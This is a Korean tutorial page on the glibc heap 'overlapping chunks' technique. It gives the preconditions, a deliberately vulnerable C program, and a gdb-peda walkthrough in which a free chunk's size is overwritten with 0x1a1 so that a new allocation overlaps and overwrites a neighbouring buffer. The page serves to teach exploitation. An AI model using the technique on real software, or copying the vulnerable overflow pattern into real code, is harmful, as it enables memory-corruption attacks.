Page tree
Skip to end of metadata
Go to start of metadata

Excuse the ads! We need some help to keep our site up.

List

Conditions

  • 해당 기술은 다음과 같은 조건에서 동작합니다.
    • 공격자에 의해 Free Chunk을 생성 할 수 있어야 합니다.
    • 공격자에 의해 Free Chunk의 size영역에 값을 저장 할 수 있어야 합니다.

Exploit plan

  • 다음과 같은 방법으로 공격할 수 있습니다.
    • 3개의 Heap을 생성합니다.

    • 2번째 Heap영역을 해제합니다.
    • Free Chunk의 size 영역에 재할당 받을 크기 값을 저장합니다.
      • 재할당 받을 크기 값 : 해제된 Heap 크기(0x100 + 0x10) + 3번째 Heap 크기(0x80 + 0x10) + PREV_INUSE(1) = 0x1a1
    • 할당받기 원하는 크기의 Heap영역을 할당받습니다.
      • 할당받기 원하는 크기 : 0x1a0 - 8 = 408
      • 2번째 Heap 영역의 시작주소를 할당 받습니다.
      • 이로 인해 3번째 영역에 값을 덮어쓸 수 있습니다.
  • malloc() 함수는 변경된 free chunk의 size 값에 의해 다음 chunk가 Top chunk를 가리키기 때문에 unlink() 함수가 호출되지 않습니다.
    • 즉, chunksize(P) != prev_size (next_chunk(P) 코드를 우회 할 수 있습니다.

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void main(){

	char *buf1 = malloc(0x100);
	char *buf2 = malloc(0x100);
	char *buf3 = malloc(0x80);

	memset(buf1, 'A', 0x100);
	memset(buf2, 'B', 0x100);
	memset(buf3, 'C', 0x80);

	free(buf2);

	int size;

	scanf("%272s",buf1);
	scanf("%d",&size);

	char *buf4 = malloc(size);

	scanf("%384s",buf4);
	printf("buf3 : %s\n",buf3);

	scanf("%128s",buf3);
	printf("buf4 : %s\n", buf4);
}

Exploit flow

Overlapping chunks

Debugging

  • 다음과 같이 Break point를 설정합니다.
    • 0x4006f8 : free(buf2) 호출

    • 0x400713 : scanf("%272s",buf1) 호출 후

    • 0x400736 : malloc(size) 호출 후 

    • 0x400750 : scanf("%384s",buf4) 호출 후

    • 0x40077c : scanf("%128s",buf3) 호출 후

Break points
gdb-peda$ b *0x00000000004006f8
Breakpoint 1 at 0x4006f8
gdb-peda$ b *0x0000000000400713
Breakpoint 2 at 0x400713
gdb-peda$ b *0x0000000000400736
Breakpoint 3 at 0x400736
gdb-peda$ b *0x0000000000400750
Breakpoint 4 at 0x400750
gdb-peda$ b *0x000000000040077c
Breakpoint 5 at 0x40077c
gdb-peda$ 
gdb-peda$ r
Starting program: /home/autolycos/Documents/def/overlapping_chunks 
  • 다음과 같이 Heap 영역이 할당되었습니다.
    • 0x602010 : 'A' * 0x100 개 저장

    • 0x602120 : 'B' * 0x100 개 저장
    • 0x602230 : 'C' * 0x80 개 저장
free(buf2)
Breakpoint 1, 0x00000000004006f8 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x0000000000000000	0x0000000000000111
0x602120:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000000	0x0000000000000091
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$ ni
0x00000000004006fd in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x0000000000000000	0x0000000000000111
0x602120:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$
  • 다음과 같이 free chunk의 size의 값을 덮어쓸 수 있습니다.
    • 'A' 256개 : buf1 영역
    • 'B' 8개 : free chunk의 prev_size 영역
    • 'C' 8개 : free chunk의 size 영역
  • free chunk의 size영역에 다음과 같이 값을 저장합니다.
    • 0x110(buf2 size) + 0x90(buf3 size) + 0x1(PREV_INUSE) = 0x1A1
Overwrite a 0x1a1 in the size area of Free Chunk
gdb-peda$ c
Continuing.

gdb-peda$ c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC
Breakpoint 2, 0x0000000000400713 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x4242424242424242	0x4343434343434343
0x602120:	0x00007ffff7dd3700	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
0x6022c0:	0x0000000000000000	0x0000000000000000
gdb-peda$
gdb-peda$ set *0x602118 = 0x1A1
gdb-peda$ set *0x60211c = 0x0
gdb-peda$ x/gx 0x602118
0x602118:	0x00000000000001a1
gdb-peda$
  • 다음과 같이 Heap 영역을 할당 받습니다.
    • 할당받을 Heap 영역의 크기 : 0x1a0 - 8 = 0x198(408)
    • 할당받은 Heap 영역의 주소 : 0x602120
    • 즉, 새로 할당 받은 영역을 이용해 buf3 영역을 덮어쓸수 있습니다.
Malloc(408)
gdb-peda$ c
Continuing.
408

Breakpoint 3, 0x0000000000400736 in main ()
gdb-peda$ i r rax
rax            0x602120	0x602120
gdb-peda$ x/54gx 0x602120 - 0x10
0x602110:	0x4242424242424242	0x00000000000001a1
0x602120:	0x00007ffff7dd3700	0x00007ffff7dd37b8
0x602130:	0x4242424242424242	0x4242424242424242
...
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x0000000000000110	0x0000000000000090
0x602230:	0x4343434343434343	0x4343434343434343
...
0x6022a0:	0x4343434343434343	0x4343434343434343
0x6022b0:	0x0000000000000000	0x0000000000020d51
gdb-peda$

  • 다음과 같이 buf4 영역을 이용해 buf3의 내용을 변경할 수 있습니다.
    • buf4 영역에 'D' 408개를 저장
scanf("%128s",buf3)
gdb-peda$ c
Continuing.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Breakpoint 4, 0x0000000000400750 in main ()
gdb-peda$ x/90gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000111
0x602010:	0x4141414141414141	0x4141414141414141
...
0x602100:	0x4141414141414141	0x4141414141414141
0x602110:	0x4242424242424242	0x00000000000001a1
0x602120:	0x4444444444444444	0x4444444444444444
0x602130:	0x4444444444444444	0x4444444444444444
0x602140:	0x4444444444444444	0x4444444444444444
0x602150:	0x4444444444444444	0x4444444444444444
0x602160:	0x4444444444444444	0x4444444444444444
0x602170:	0x4444444444444444	0x4444444444444444
0x602180:	0x4444444444444444	0x4444444444444444
0x602190:	0x4444444444444444	0x4444444444444444
0x6021a0:	0x4444444444444444	0x4444444444444444
0x6021b0:	0x4444444444444444	0x4444444444444444
0x6021c0:	0x4444444444444444	0x4444444444444444
0x6021d0:	0x4444444444444444	0x4444444444444444
0x6021e0:	0x4444444444444444	0x4444444444444444
0x6021f0:	0x4444444444444444	0x4444444444444444
0x602200:	0x4444444444444444	0x4444444444444444
0x602210:	0x4444444444444444	0x4444444444444444
0x602220:	0x4444444444444444	0x4444444444444444
0x602230:	0x4444444444444444	0x4444444444444444
0x602240:	0x4444444444444444	0x4444444444444444
0x602250:	0x4444444444444444	0x4444444444444444
0x602260:	0x4444444444444444	0x4444444444444444
0x602270:	0x4444444444444444	0x4444444444444444
0x602280:	0x4444444444444444	0x4444444444444444
0x602290:	0x4444444444444444	0x4444444444444444
0x6022a0:	0x4444444444444444	0x4444444444444444
0x6022b0:	0x4444444444444444	0x0000000000020d00
0x6022c0:	0x0000000000000000	0x0000000000000000

gdb-peda$ c
Continuing.
buf3 : DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Related information